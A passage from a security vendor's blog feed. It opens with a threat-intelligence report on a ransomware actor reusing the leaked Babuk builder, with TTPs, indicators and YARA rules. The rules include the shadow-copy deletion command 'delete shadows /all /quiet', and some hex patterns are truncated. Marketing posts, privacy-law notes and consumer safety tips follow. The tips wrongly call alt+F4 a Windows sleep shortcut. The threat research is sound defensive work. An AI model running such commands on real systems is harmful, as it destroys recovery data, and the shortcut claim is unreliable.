Thus, even those operators at the bottom of the ransomware food chain have the opportunity to build on others’ work, to stake their claim on a proportion of the money to be made from data exfiltration and extortion.

ATR’s Theory of Evolution

A Yara rule dedicated to Babuk ransomware triggered a new sample uploaded on VirusTotal, which brings us to our ‘lowly-paid’ ransomware actor.

From a quick glance at the sample we can deduce that it is a copied and pasted binary output from Babuk’s builder, with an edited ransom note naming the version “Delta Plus”, two recovery email addresses and a new Bitcoin address for payments:

Figure 4: Strings content of “Delta Plus” named version of Babuk

We’ve seen the two email recovery addresses before – they have been used to deliver random ransomware in the past and, by using them to pivot, we were able to delve into the actor’s resume:

The first email address,, has been used to drop a .NET ransomware mentioning “Delta Plus”:

Figure 5: Strings content of .NET ransomware related to previous Delta ransomware activities

Filename Setup.exe
Compiled Time Tue Sep  7 17:58:34 2021
FileType Win32 EXE
FileSize 22.50 KB
Sha256 94fe0825f26234511b19d6f68999d8598a9c21d3e14953731ea0b5ae4ab93c4d

The ransomware is pretty simple to analyze; all mechanisms are declared, and command lines, registry modification, etc., are hardcoded in the binary.

Figure 6: .NET analysis with command line details

In fact, the actor’s own ransomware is so poorly developed (no packing, no obfuscation, command lines embedded in the binary and the fact that the .NET language is easy to analyze) that it is hardly surprising they started using the Babuk builder instead.

By way of contrast, their new project is well developed, easy to use and efficient, no to mention painful to analyze (as it is written in the Golang language) and provides executables for Windows, Linux and network attached storage (NAS) systems.

The second email address,, has been used to drop an earlier version of the .NET ransomware

Figure 7: Strings content from first version of .NET ransomware

Filename test2.exe
Compiled Time Mon Aug 30 19:49:54 2021
FileType Win32 EXE
FileSize 15.50 KB
Sha256 e1c449aa607f70a9677fe23822204817d0ff41ed3047d951d4f34fc9c502f761

Tactics, Techniques and Procedures

By checking the relationships between “Delta ransomware”, the Babuk iteration and the domains contacted during process execution, we can observe some domains related to our sample:

Thanks to a misconfiguration, files hosted on those two domains are accessible through Open Directory (OpenDir), which is a list of direct links to files stored on a server:

Figure 8: Open Directories website where samples are hosted

  • bat.rar: A PowerShell script used to perform several operations:
    • Try to disable Windows Defender
    • Bypass User Account Control (UAC)
    • Get system rights via runasti

Figure 9: Privilege escalation to get system rights

  • exe.rar: Delta Plus ransomware
  • reg.rar: Registry values used to disable Windows Defender

Figure 10: Registry value modifications to disable Windows Defender

Other domains where files are hosted contain different tools used during attack operations:

  • We’ve found two methods employed by the operator, which we assume to be used for initial access: First, a fake Flash Player installer and, secondly, a fake Anydesk remote tool installer used to drop the ransomware. Our theory about Flash Player initial access has been confirmed by checking the IP that hosts most of the domains:

Figure 11: Fake Flash website used to download fake Flash installer

When logging in, the website warns you that your Flash Player version is outdated and tries to download the Fake Flash Player installer:

Figure 12: JavaScript variables used to drop fake Flash Installer

A secondary site appears to have also been utilized in propagating the fake Flash Player, though it is currently offline :

Figure 13: JavaScript function to download the fake Flash Installer from another website

  • Portable Executable (PE) files used to launch PowerShell command lines to delete shadow copies, exclude Windows Defender and import registry keys from “Update.reg.rar” to disable Windows defender.
  • A PE file used for several purposes: Exfiltrating files from the victim, keylogging, checking if the system has already been held to ransom, getting system information, obtaining user information and to create and stop processes.

Figure 14: Functions and C2 configuration from ransomware sample

(host used for extraction)

  • In addition to the above, we also found evidence that this actor tried to leverage another ransomware builder leak, Chaos ransomware.


The majority of domains used by this actor are hosted on the same IP: “” (AS 270564 / MASTER DA WEB DATACENTER LTDA).

But as we saw by “analyzing” the extraction tool used by the actor, another IP is mentioned: “149.56147.236” (AS 16276 / OVH SAS). On this IP, some ports are open, such as FTP (probably used to store exfiltrated data), SSH, etc.

By looking at this IP with Shodan, we can get a dedicated hash for the SSH service, plus fingerprints to use on this IP, and then find other IPs used by the actor during their operations.

By using this hash, we were able to map the infrastructure by looking for other IPs sharing the same SSH key + fingerprintings.

At least 174 IPs are sharing the same SSH pattern (key, fingerprint, etc.); all findings are available in the IOCs section.

Some IPs are hosting different file types, maybe related to previous campaigns:

Figure 15: Open Directory website probably used by the same actor for previous campaigns

Bitcoin Interests

Most of the ransomware samples used by the actor mention different Bitcoin (BTC) addresses which we assume is an effort to obscure their activity.

By looking for transactions between those BTC addresses with CipherTrace, we can observe that all the addresses we extracted (see the circle highlighted with a yellow “1” below) from the samples we’ve found are related and eventually point to a single Bitcoin wallet, probably under control of the same threat actor.

From the three samples we researched, we were able to extract the following BTC addresses:

  • 3JG36KY6abZTnHBdQCon1hheC3Wa2bdyqs
  • 1Faiem4tYq7JQki1qeL1djjenSx3gCu1vk
  • bc1q2n23xxx2u8hqsnvezl9rewh2t8myz4rqvmdzh2

Figure 16: Follow the money with CipherTrace

Ransomware Isn’t Just About Survival of the Fittest

As we have seen above, our example threat actor has evolved over time, moving from simplistic ransomware and demands in the hundreds of dollars, to toying with at least two builder leaks and ransom amounts in the thousands of dollars range.

While their activity to date suggests a low level of technical skill, the profits of their cybercrime may well prove large enough for them to make another level jump in the future.

Even if they stick with copy-pasting builders and crafting ‘stagers’, they will have the means at their disposal to create an efficient attack chain with which to compromise a company, extort money and improve their income to the point of becoming a bigger fish in a small pond, just like the larger RaaS crews.

In the meantime, such opportunitistic actors will continue to bait their hooks and catch any fish they can as, unlike affiliated ransomware operators, they do not have to follow any rules in return for support (pentest documentation, software, infrastructure, etc.) from the gang’s operators. Thus, they have a free hand to carry out their attacks and, if a victim wants to bite, they don’t care about ethics or who they target.

The good news for everyone else, however, is the fact that global law enforcement isn’t gonna need a bigger boat, as it already casts its nets far and wide.


Mitre Att&ck

Technique ID Technique Description Observable
T1189 Drive By Compromise The actor is using a fake Flash website to spread fake a Flash installer.
T1059.001 Command Scripting Interpreter: PowerShell PowerShell is used to launch command lines (delete shadow copies, etc.).
T1059.007 Command and Scripting Interpreter: JavaScript JavaScript is used in the fake Flash website to download the fake Flash installer.
T1112 Modify Registry To disable Windows Defender, the actor modifies registry. “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender” and “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection”.
T1083 File and Directory Discovery The actor is listing files on the victim system.
T1057 Process Discovery The actor is listing running processes on the victim system.
T1012 Query Registry To perform some registry modifications, the actor is first querying registry path.
T1082 System Information Discovery Before encrypting files, the actor is listing hard drives.
T1056.001 Input Capture: Keylogging The exfiltration tool has the capability to log user keystrokes.
T1005 Data from Local System
T1571 Non-Standard Port The actor is using port “1177” to exfiltrate data.
T1048 Exfiltration Over Alternative Protocol
T1486 Data Encrypted for Impact Data encrypted by ransomware.
T1490 Inhibit System Recovery Delete Shadow Copies.


Detection Mechanisms

Sigma Rules

–          Shadow Copies Deletion Using Operating Systems Utilities:

–          Drops Script at Startup Location:

–          File Created with System Process Name:

–          Suspicious Svchost Process:

–          System File Execution Location Anomaly:

–          Delete Shadow copy via WMIC:

–          Always Install Elevated Windows Installer:


Yara Rules

Babuk Ransomware Windows

rule Ransom_Babuk {


description = “Rule to detect Babuk Locker”

author = “TS @ McAfee Enterprise ATR”

date = “2021-01-19”

hash = “e10713a4a5f635767dcd54d609bed977”

rule_version = “v2”

malware_family = “Ransom:Win/Babuk”

malware_type = “Ransom”

mitre_attack = “T1027, T1083, T1057, T1082, T1129, T1490, T1543.003”



$s1 = {005C0048006F007700200054006F00200052006500730074006F0072006500200059006F00750072002000460069006C00650073002E007400780074}

//  \ How To Restore Your Files .txt

$s2 = “delete shadows /all /quiet” fullword wide


$pattern1 = {006D656D74617300006D65706F63730000736F70686F730000766565616D0000006261636B7570000047785673730000004778426C7200

$pattern2 = {004163725363683253766300004163726F6E69734167656E74000000004341534144324457656253766300000043414152435570646174655376630000730071}

$pattern3 = {FFB0154000C78584FDFFFFB8154000C78588FDFFFFC0154000C7858CFDFFFFC8154000C78590FDFFFFD0154000C78594FDFFFFD8154

$pattern4 ={400010104000181040002010400028104000301040003810400040104000481040005010400058104000601040006C104000781040008



filesize >= 15KB and filesize <= 90KB and

1 of ($s*) and 3 of ($pattern*)



Exfiltration Tool

rule CRIME_Exfiltration_Tool_Oct2021 {


description = “Rule to detect tool used to exfiltrate data from victim systems”

author = “TS @ McAfee Enterprise ATR”

date = “2021-10-04”

hash = “ceb0e01d96f87af0e9b61955792139f8672cf788d506c71da968ca172ebddccd”



$pattern1 = {79FA442F5FB140695D7ED6FC6A61F3D52F37F24B2F454960F5D4810C05D7A83D4DD8E6118ABDE2055E4D

$pattern2 = {B4A6D4DD1BBEA16473940FC2DA103CD64579DD1A7EBDF30638A59E547B136E5AD113835B8294F53B8C3A

$pattern3 = {262E476A45A14D4AFA448AF81894459F7296633644F5FD061A647C6EF1BA950FF1ED48436D1BD4976BF8

$pattern4 = {F2A113713CCB049AFE352DB8F99160855125E5A045C9F6AC0DCA0AB615BD34367F2CA5156DCE5CA286CC



3 of ($pattern*)





Infrastructure URLs


Infrastructure Domains


Infrastructure IPs


Ransomware Hashes












Bitcoin Addresses









PowerShell Script



Exfiltration Tool




Fake Flash Player installer



Fake Anydesk Installer




The post Is There Really Such a Thing as a Low-Paid Ransomware Operator? appeared first on McAfee Blogs.

Unravel the XDR Noise and Recognize a Proactive Approach Mon, 18 Oct 2021 15:00:26 +0000 /blogs/?p=110335

Cybersecurity professionals know this drill well all too well. Making sense of lots of information and noise to access what...

The post Unravel the XDR Noise and Recognize a Proactive Approach appeared first on McAfee Blogs.


Cybersecurity professionals know this drill well all too well. Making sense of lots of information and noise to access what really matters. XDR (Extended Detection & Response) continues to be a technical acronym thrown around in the cybersecurity industry with many notations and promises. Every vendor offering cybersecurity has an XDR song to sing. Interestingly, some either miss a beat or require tuning since it’s still quite an emerging market.  This can be intriguing and nagging for cybersecurity professionals who are heads down defending against the persistent adversaries. The intent of this blog is to clarify XDR and remove the noise and hype into relevant and purposeful cybersecurity conversations with actions. And observe the need for a proactive approach.

Let’s begin with what does XDR refer to and its evolution. As noted earlier, XDR stands for Extended Detection and Response. “extended” is going beyond the endpoint to network and cloud infrastructure. You will find this cross-infrastructure or cross-domain capability is the common denominator for XDR.  XDR is the next evolution of a solid Endpoint Detection and Response (EDR). Ironically it was a term introduced by a network security vendor with aspirations to enter the emerging Security Operations market.

A Look at the Industry Point of Views

Industry experts have weighed in on this XDR capability for cybersecurity and agree it’s still relatively early to market. Gartner’s definition, XDR is “a SaaS-based, vendor-specific, security threat detection and incident response tool that natively integrates multiple security products into a cohesive security operations system that unifies all licensed components.” Gartner notes three primary requirements of an XDR system are; centralization of normalized data primarily focused on the XDR vendors’ ecosystem, correlation of security data and alerts into incidents and centralized incident response capability that can change the state of individual security products as part of incident response or security policy setting. If you want to hear more from Gartner on this topic, check out the report.

ESG defines XDR as an integrated suite of security products spanning hybrid IT architectures, designed to interoperate and coordinate on threat prevention, detection and response. In other words, XDR unifies control points, security telemetry, analytics, and operations into one enterprise system. The cross-vector analytics must be enhanced to track advanced multi-stage attacks.  In addition, implementation guidance such as reference architecture is needed to assure successful integrated workflows.

Forrester views XDR as the next generation of Endpoint Detection and Response to evolve to by integrating endpoint, network and application telemetry. The integration options are native where the integration is with one vendor’s portfolio or hybrid where the vendor integrates with other security vendors.  The key goals include empowering analysts with incident-driven analytics for root cause analysis, offer prescriptive remediation with the ability to orchestrate it and map uses cases MITRE ATT&CK techniques and chain them into complex queries that describe behaviors, instead of individual events.

XDR Themes

The common XDR themes from these XDR discussions are multiple security functions integrated and curated data across the control vectors all working together to achieve better security operational efficiencies while responding to a threat. Cross control points make sense since the adversary movement is erratic.  Emphasis is on removing complexity and offering better detection and understanding of the risk in the environment and quickly sorting through a possible response.  The range of detect and response capabilities also suggest that it cannot be done by one exclusive vendor. Many advocates an integrated partnership approach to unify defenses and streamline efforts across domains and vectors. It’s a more realistic approach as well since most organizations do not fulfil their entire security function with one vendor.  While buying an XDR “suite” from one vendor is easier where most of the security tools come from one vendor, some critical security functions from another vendor should be included to drive a more effective detect and response.  This is not a new concept to connect the security disciplines to work together, as matter fact, McAfee Enterprise has been professing and delivering on Together is Power motto for some time.

One more consideration on this unified and integrated security XDR theme, many vendors may proclaim this but look under the hood carefully. They may have a unified view in a single console but has the data from all the separate vectors been automatically assessed, triaged and providing meaningful and actionable next steps?

Another common XDR theme is the promise to accelerate investigation efforts by offering automatic analysis of findings and incidents to get closer to a better assessment. This makes your reactive cycles potentially less frequent.

Integrating security across the enterprise and control points and accelerating investigations are critical functions. Does it address organizational nuances like is this threat a high priority because it is prevalent in my geo and industry and it’s impacting target assets with highly sensitive data.  Prioritization should also be an XDR theme but not necessarily noted in these XDR discussions.  Encourage you to read this blog on The Art of Ruthless Prioritization and Why It Matters to Sec Ops.

Net Out the Core XDR Functions

After distilling the many point of views and the themes on XDR, it seems the core functions all focus on improving security operations immensely during an attack.  So, it’s a reactive function


XDR Core & Baseline functions  Why? 
Cross infrastructure—comprehensive vector coverage   Gain comprehensive visibility & control across your entire organization and stop operating in silos  

Remove disparate efforts between tools, data and functional areas  

Distilled data and correlated alerts across the organization   Remove manual discover and make sense of it all  
Unified management with a common experience   From a common view or starting point removes the jumping between consoles and data pools to assure more timely and accurate responses  
Security functions automatically exchange and trigger actions   Some security functions need to be automated like detection or response   
Advanced functions—not noted in many XDR discussions  Why? 
Actionable intelligence on potentially relevant threats   Allow organizations to proactively harden their environment before the attack  
Rich context that includes threat intelligence and organizational impact insight   Organizations can prioritize their threat remediation efforts on major impact to the organization  
Security working together with minimal effort   Simply tie a range of security functions together to create a united front and optimize security investments  


Key Desired Outcomes

The end game is better security operational efficiencies. This can be expressed in a handy outcome check list perhaps helpful when assessing XDR solutions.

Visibility  Control 
More accurate detection   More accurate prevention  
Adapt to changing technologies & infrastructure   Adapt to changing technologies & infrastructure  
Less blind spots   Less gaps  
Faster time to detect (or Mean Time to Detect-MTTD)   Faster time to remediate (or Mean Time to Respond-MTTR)  
Better views and searchability   Prioritized hardening across portfolio—not isolated efforts  
Faster & more accurate investigations (less false positive)    Orchestrate the control across the entire IT infrastructure  

A More Proactive Approach is Needed

McAfee Enterprise goes beyond the common XDR capabilities in the recently announced MVISION XDR and offers unmatched proactivity and prioritization producing smarter and better security outcomes. This means your SOC spends less time on error-prone reactive fire drills with weeks of investigation.  SOCs will respond and protect what counts a lot quicker. Imagine getting ahead of the adversary before they attack.

Solution or Approach?

Is XDR a solution or product to be bought or an approach an organization’s must rally their security strategy to take?  Honestly it can be both.  Many vendors are announcing XDR products to buy or XDR capabilities.  An XDR approach will shift processes and likely to merge and encourage tighter coordination between different functions like SOC analysts, hunters, incident responders and IT administrators.

Is XDR for everyone?

It depends on the organizations’ current cybersecurity maturity and readiness to embrace the breadth and required processes to obtain the SOC efficiency benefits. With the promise to correlate data across the entire enterprise implies some of the mundane and manual efforts to make sense of data into a better and actionable understanding of a threat are removed.  Now this is good for organizations on both spectrums.  Less mature organizations who do not have resources or expertise and do not consume data intelligence to shift through will appreciate this correlation and investigation step, but can they continue the pursuit of what does this mean to me. Medium to high mature cybersecurity organizations with expertise will not need to do the manual work to make sense of data. The difference with mature organizations comes with the next steps to further investigate and to decide on the remediation steps. Less mature organizations will not have the expertise to accomplish this. So, the real make a difference moment is for the more mature organization who can move more quickly to a response mode on the potential threat or threat in progress.

Your XDR Journey

If you are a medium to high mature cybersecurity organization, the question comes how and when. Most organizations using an Endpoint Detection and Response (EDR) solution are likely quite ready to embrace the XDR capabilities since their efforts are already investigating and resolving endpoint threats. It’s time to expand this effort gaining better understanding of the adversary’s movement across the entire infrastructure.  If you are using MVISION EDR you are already using a solution with XDR capabilities since it digests SIEM data from McAfee Enterprise ESM or Splunk (which means it goes beyond the endpoint, a key XDR requirement.)  Check out the latest award MVISION XDR received amongst the many recognitions.

Hope this blog removed the jargon and fog around XDR and offers actionable considerations for your organization to boost their SOC efforts. Start your XDR journey here.

The post Unravel the XDR Noise and Recognize a Proactive Approach appeared first on McAfee Blogs.

China Personal Information Protection Law (PIPL): A New Take on GDPR? Thu, 14 Oct 2021 17:16:46 +0000

Many people have heard of the GDPR (General Data Protection Regulation), legislation that became law across the EU in May...

The post China Personal Information Protection Law (PIPL): A New Take on GDPR? appeared first on McAfee Blogs.


Many people have heard of the GDPR (General Data Protection Regulation), legislation that became law across the EU in May 2018.  It was designed to regulate how businesses protect personal data, notably how personal data is processed, and granted rights to individuals to exercise more control over their personal data.

GDPR is a framework which requires businesses to implement processes to enable them to understand where data is held, how it is used, how long it is kept for, how this can be reported to individuals, and how they may request its correction or deletion.

A critical – and often misunderstood – aspect of GDPR is that it doesn’t just apply to EU businesses.  Any company in the world that stores information on EU citizens must adhere to the regulations; serious breaches can result in significant fines.  Even just the top five companies that were penalized since GDPR’s introduction run into the hundreds of millions of US dollars!  These regulations have teeth, so people pay attention to them.

Beyond GDPR’s own impact in protecting the rights of EU residents, perhaps its greatest legacy has been to increase expectations for how organizations handle personal data the world over. GDPR has set a new global standard, and we are seeing it serve as the model for a number of similar laws being mooted or passed by governments all over the world. With that in mind, how many businesses have heard of the PIPL (Personal Information Protection Law)?  In August 2021, the Standing Committee of the National People’s Congress, the top legislative body in the People’s Republic of China, voted for this law to take effect on Nov. 1, 2021.  It has many similarities to GDPR, a key one being that it also applies world-wide with respect to data held on Chinese citizens.  If your company is a multi-national corporation that deals with Chinese individuals then it applies to you, no matter where your business is incorporated or headquartered.

Likely many of the processes you have in place for GDPR can be repurposed for PIPL, however you will be looking for different data.  McAfee’s Data Protection products (MVISION Unified Cloud Edge, MVISION Cloud, Endpoint DLP, and Network DLP) will help you identify where PIPL-relevant data is held and how it is being used.  Data classifications/data identifiers for the Chinese Resident Identity Card, passport numbers, mobile phones etc can be identified in data stored in the cloud and on premise.  McAfee’s unique multi-vector data exfiltration protection (more on that here) can also assist in ensuring that sensitive PII data doesn’t end up somewhere it shouldn’t.  Here’s a view of our management console showing how we can identify Chinese PII:

No individual product can claim to make a business “PIPL compliant”, but products such as McAfee’s Data Protection suites should be considered a key part of a toolbox to aid in this goal. The fact that we’ve had this capability within our products for an extended time, well before the introduction of PIPL, is yet another datapoint as to why Gartner named MVISION Cloud THE market leader in the CASB Magic Quadrant and why Forrester named us a leader in their Forrester Wave ™ Unstructured Data Security Platforms.

November is barely a month away and if you’re not already considering how to handle PIPL, you now need to make this a priority.  Consider testing and enabling our Chinese PII classifications.  If you’re running another vendor’s product that doesn’t offer such capability then take a look at how our MVISION Unified Cloud Edge solution can help solve this along with the digital transformation to cloud first that most companies have already undertaken.

The post China Personal Information Protection Law (PIPL): A New Take on GDPR? appeared first on McAfee Blogs.

How to Secure All Your Everyday Connected Devices Thu, 14 Oct 2021 13:35:40 +0000

Take a roll call of all your devices that connect to the internet. These include the obvious ones – laptops, tablets, and your smartphone....

The post How to Secure All Your Everyday Connected Devices appeared first on McAfee Blogs.


Take a roll call of all your devices that connect to the internet. These include the obvious ones – laptops, tablets, and your smartphone. But they also include the ones you may not immediately think about, such as routers, smart TVs and thermostats, virtual assistant technology, and connected fitness watches and equipment. 

Each of these devices is known as an endpoint to you. To a cybercriminal, they’re an entry point into your online information. It’s important to secure every endpoint so that you can confidently go about your day-to-day without worrying about your security. Here’s the definitive device security checklist to get you on your way confidently and safely. 

1. Laptops and desktops 

Laptops and desktops are prime entryways into your online life. Think of all the payment information, passwords, and maybe even tax documents you store on it. The best way to protect the contents of your laptops and desktops is to password-protect your computer with strong passwords or passphrases. Here are a few password and passphrase best practices: 

  • Make your password at least 12 characters long 
  • Choose a unique password that is not shared with any other device or account 
  • Replace some letters with numbers or symbols 
  • Use a mix of capital and lowercase letters 

Especially if you work at common spaces like coffee shops, the library, or even your kitchen table, get in the habit of putting your computer to sleep when you step away. Commit the sleep command shortcut to memory to make it less of a hassle. For example, on Mac computers, the keyboard command is command + option + eject, and for Windows, it’s alt + F4. 

Speaking of common spaces, whenever you log in from a public Wi-Fi network, always log in with a virtual private network (VPN). A VPN scrambles your data, making it indecipherable to any malicious characters who may be lurking on public networks. 

Multifactor authentication is another way to protect your valuable devices and accounts. This means that anyone trying to log in on your device needs to provide at least two forms of identification. Forms of ID could include a text message with a one-time code or a fingerprint or face scan in addition to a correct password. 

2. Smartphones and Tablets 

These two devices are grouped because the security features on them are similar. Just like with computers, put your device to sleep every time you walk away from it. It’s much easier and may already be in your routine to hit the sleep button when you put down your cellphone or tablet. 

Always put a passcode on your smartphones and tablets. Choose a collection of numbers that do not have an obvious connection to you, such as important birthdays or parts of your phone number. Even if they’re a random assortment, you’ll get the hang of them quickly. Or to make sure only you can enter your phone, set up a facial or fingerprint ID scan. People have several passwords and account combinations they have to remember. To take the guesswork and trial and error of logging in, consider trusting your passwords to a password manager that can remember them for you!  

A great mobile phone and tablet habit you should adopt is backing up your files regularly to the cloud. In the event that you lose your device or if someone steals it, at least it’s valuable — and in some cases, priceless — content is safe. You may be able to remotely “brick” your device to keep a stranger from breaking into your accounts. Bricking a device means remotely wiping a connected device and rendering it unusable. 

3. Router 

Your router is the gateway to all the connected devices in your home; thus, it’s key to beef up its security. The best way to do so is to make sure that you customize the router name and password to make it different from the factory settings. Always password-protect your home router! Employing password best practices you use for your online accounts and your devices will prevent strangers from hopping onto your network. Another way to keep your Wi-Fi network out of the hands of strangers is to toggle on the setting to not appear to non-users. While it’s fun seeing the quirky names your neighbors choose for their home networks, it’s best to keep yours completely private. 

4. Virtual Assistant Technology and Smart Home Devices 

There have been some unsettling reports about cybercriminals commandeering smart home devices and virtual assistant technology. For example, a cybercriminal hacked a homeowner’s virtual assistant and blasted music through the home’s speakers, and turn the heat up to 90 degrees. The key to securing the connected devices that are responsible for your heating and cooling, shopping lists, and even your home security system is to ensure it is connected to a secure router and protected by a strong password. 

Also, keep an eye on software updates, which include security upgrades. If you don’t think you have time to manually update software, set up your devices to automatically update. This will give you peace of mind knowing that you have the latest security patches and bug fixes as soon as they are available.  

IoT fitness watches and machines are fun additions to your workout routines. In the case of Peloton bikes, they track your heartbeat and location and offer a huge library of classes. However, cybercriminals may be able to track your workouts if they break their way into your fitness devices. The best way to keep your workouts private is to turn off geolocation and make sure you are up to date with all software releases and protect your accounts with strong passwords. 

Cover All Your Bases 

If you’re looking for a tool to put your mind at ease, consider McAfee Total Protection. It includes antivirus and safe browsing software plus a secure VPN. You can be confident that your personal information is safe, thus allowing you to enjoy the full potential of all your devices. 

The post How to Secure All Your Everyday Connected Devices appeared first on McAfee Blogs.

Top Signs of Identity Theft Wed, 13 Oct 2021 23:32:08 +0000

When it comes to identity theft, trust your gut when something doesn’t feel right. Follow up. What you’re seeing could be a sign of identity theft.  A missing...

The post Top Signs of Identity Theft appeared first on McAfee Blogs.


When it comes to identity theft, trust your gut when something doesn’t feel right. Follow up. What you’re seeing could be a sign of identity theft. 

A missing bill or a mysterious charge on your credit card could be the tip of an identity theft iceberg, one that can run deep if left unaddressed. Here, we’ll look at several signs of identity theft that likely need some investigation and the steps you can take to take charge of the situation. 

How does identity theft happen in the first place? 

Unfortunately, it can happen in several ways.  

  • In the physical world, it can happen simply because you lost your wallet or debit card. However, there are also cases where someone gets your information by going through your mail or trash for bills and statements. In other more extreme cases, theft can happen by someone successfully registering a change of address form in your name (although the U.S. Postal Service has security measures in place that make this difficult).  
  • In the digital world, that’s where the avenues of identity theft blow wide open. It could come by way of a data breach, a thief “skimming” credit card information from a point-of-sale terminal, or by a dedicated crook piecing together various bits of personal information that have been gathered from social media, phishing attacks, or malware designed to harvest information. Additionally, thieves may eavesdrop on public Wi-Fi and steal information from people who’re shopping or banking online without the security of a VPN.   

Regardless of how crooks pull it off, identity theft is on the rise. According to the Federal Trade Commission (FTC), identity theft claims jumped up from roughly 650,000 claims in 2019 to nearly 1.4 million in 2020—practically double. Of the reported fraud cases where a dollar loss was reported, the FTC calls out the following top three contact methods for identity theft: 

  • Online ads that direct you to a scammer’s site are designed to steal your information. 
  • Malicious websites and apps also steal information when you use them. 
  • Social media scams lure you into providing personal information, whether through posts or direct messages. 

However, phone calls, texts, and email remain the most preferred contact methods that fraudsters use, even if they are less successful in creating dollar losses than malicious websites, ads, and social media. 

What are some signs of identity theft? 

Identity thieves leave a trail. With your identity in hand, they can charge things to one or more of your existing accounts—and if they have enough information about you, they can even create entirely new accounts in your name. Either way, once an identity thief strikes, you’re probably going to notice that something is wrong. Possible signs include: 

  • You start getting mail for accounts that you never opened.  
  • Statements or bills stop showing up from your legitimate accounts. 
  • You receive authentication messages for accounts you don’t recognize via email, text, or phone.  
  • Debt collectors contact you about an account you have no knowledge of. 
  • Unauthorized transactions, however large or small, show up in your bank or credit card statements. 
  • You apply for credit and get unexpectedly denied. 
  • And in extreme cases, you discover that someone else has filed a tax return in your name. 

As you can see, the signs of possible identity theft can run anywhere from, “Well, that’s strange …” to “OH NO!” However, the good news is that there are several ways to check if someone is using your identity before it becomes a problem – or before it becomes a big problem that gets out of hand.  

Steps to take if you suspect that you’re the victim of identity theft 

The point is that if you suspect fraud, you need to act right away. With identity theft becoming increasingly commonplace, many businesses, banks, and organizations have fraud reporting mechanisms in place that can assist you should you have any concerns. With that in mind, here are some immediate steps you can take: 

1) Notify the companies and institutions involved 

Whether you spot a curious charge on your bank statement or you discover what looks like a fraudulent account when you get your free credit report, let the bank or business involved know you suspect fraud. With a visit to their website, you can track down the appropriate number to call and get the investigation process started.  

2) File a police report 

Some businesses will require you to file a local police report to acquire a case number to complete your claim. Even beyond a business making such a request, filing a report is still a good idea. Identity theft is still theft and reporting it provides an official record of the incident. Should your case of identity theft lead to someone impersonating you or committing a crime in your name, filing a police report right away can help clear your name down the road. Be sure to save any evidence you have, like statements or documents that are associated with the theft. They can help clean up your record as well. 

3) Contact the Federal Trade Commission (FTC) 

The FTC’s identity theft website is a fantastic resource should you find yourself in need. Above and beyond simply reporting the theft, the FTC can provide you with a step-by-step recovery plan—and even walk you through the process if you create an account with them. Additionally, reporting theft to the FTC can prove helpful if debtors come knocking to collect on any bogus charges in your name. You can provide them with a copy of your FTC report and ask them to stop. 

4) Place a fraud alert and consider a credit freeze 

You can place a free one-year fraud alert with one of the major credit bureaus (Experian, TransUnion, Equifax), and they will notify the other two. A fraud alert will make it tougher for thieves to open accounts in your name, as it requires businesses to verify your identity before issuing new credit in your name. 

A credit freeze goes a step further. As the name implies, a freeze prohibits creditors from pulling your credit report, which is needed to approve credit. Such a freeze is in place until you lift it, and it will also apply to legitimate queries as well. Thus, if you intend to get a loan or new credit card while a freeze is in place, you’ll likely need to take extra measures to see that through. Contact each of the major credit bureaus (Experian, TransUnion, Equifax) to put a freeze in place or lift it when you’re ready. 

5) Dispute any discrepancies in your credit reports 

This can run the gamut from closing any false accounts that were set up in your name, removing bogus charges, and correcting information in your credit report such as phony addresses or contact information. With your FTC report, you can dispute these discrepancies and have the business correct the record. Be sure to ask for written confirmation and keep a record of all documents and conversations involved.  

6) Contact the IRS, if needed 

If you receive a notice from the IRS that someone used your identity to file a tax return in your name, follow the information provided by the IRS in the notice. From there, you can file an identity theft affidavit with the IRS. If the notice mentions that you were paid from an employer you don’t know, contact that employer as well and let them know of possible fraud—namely that someone has stolen your identity and that you don’t truly work for them. 

Also, be aware that the IRS has specific guidelines as to how and when they will contact you. As a rule, they will most likely contact you via physical mail delivered by the U.S. Postal Service. (They won’t call or apply harassing pressure tactics—only scammers do that.) Identity-based tax scams are a topic all of their own, and for more on it, you can check out this article on tax scams and how to avoid them. 

7) Continue to monitor your credit report, invoices, and statements 

Another downside of identity theft is that it can mark the start of a long, drawn-out affair. One instance of theft can possibly lead to another, so even what may appear to be an isolated bad charge on your credit card calls for keeping an eye on your identity. Many of the tools you would use up to this point still apply, such as checking up on your credit reports, maintaining fraud alerts as needed, and reviewing your accounts closely. 

Righting the wrongs of identity theft: deep breaths and an even keel 

Realizing that you’ve become a victim of identity theft carries plenty of emotion with it, which is understandable—the thief has stolen a part of you to get at your money, information, and even reputation. Once that initial rush of anger and surprise has passed, it’s time to get clinical and get busy. Think like a detective who’s building – and closing – a case. That’s exactly what you’re doing. Follow the steps, document each one, and build up your case file as you need. Staying cool, organized, and ready with an answer for any questions you’ll face in the process of restoring your identity will help you see things through. 

Once again, this is a good reminder that vigilance is the best defense against identity theft from happening in the first place. While there’s no absolute, sure-fire protection against it, there are several things you can do to lower the odds in your favor. And at the top of the list is keeping consistent tabs on what’s happening across your credit reports and accounts. 

The post Top Signs of Identity Theft appeared first on McAfee Blogs.

5 Ways to Get Kids Focused on Their Online Privacy Wed, 13 Oct 2021 13:15:07 +0000

Kids engage online far differently than adults. Between group chats, social apps, and keeping up with digital trends, their interests, and attention spans constantly shift, which means online privacy...

The post 5 Ways to Get Kids Focused on Their Online Privacy appeared first on McAfee Blogs.


Kids engage online far differently than adults. Between group chats, social apps, and keeping up with digital trends, their interests, and attention spans constantly shift, which means online privacy concerns get sidelined.  

That’s why, throughout October—Cybersecurity Awareness Month—we will be doubling up on resources and insights your family needs to be safer and more secure online. Ready to roll? Here are a few ways to move online privacy center stage.   

5 ways to focus kids on privacy 

1. Safeguard the fun. 

Few things will put kids to sleep faster than talking with parents about online stuff like privacy. So, flip the script. Talk about the things they love online—shopping, TikTok, and friend groups. All that fun could come to a screeching halt should a bad actor get a hold of your child’s data. Establishing strong digital habits allows your child to protect what they enjoy including their Venmo account, video games, and midnight chatting. Doing simple things such as maximizing privacy settings on social networks, limiting their social circles to known friends, and refraining from oversharing, can dramatically improve digital privacy.  

2. Relationship = safety. 

We say it often: The best way to keep your kids safe online is a strong relationship. A healthy parent-child connection is at the heart of raising kids that can make good choices online. Connect with your child daily. Talk about what’s important to them. Listen. Ask them to show you their favorite apps. Soon, you’ll discover details about their online life and gain the trust you need to discuss difficult topics down the road.   

Layer up your protection.

Studies show that 88% of all data breaches are due to human error. For that reason, consider putting an extra layer of protection between your family and cyberspace. A few ways to do that:

3. Build your digital offense. 

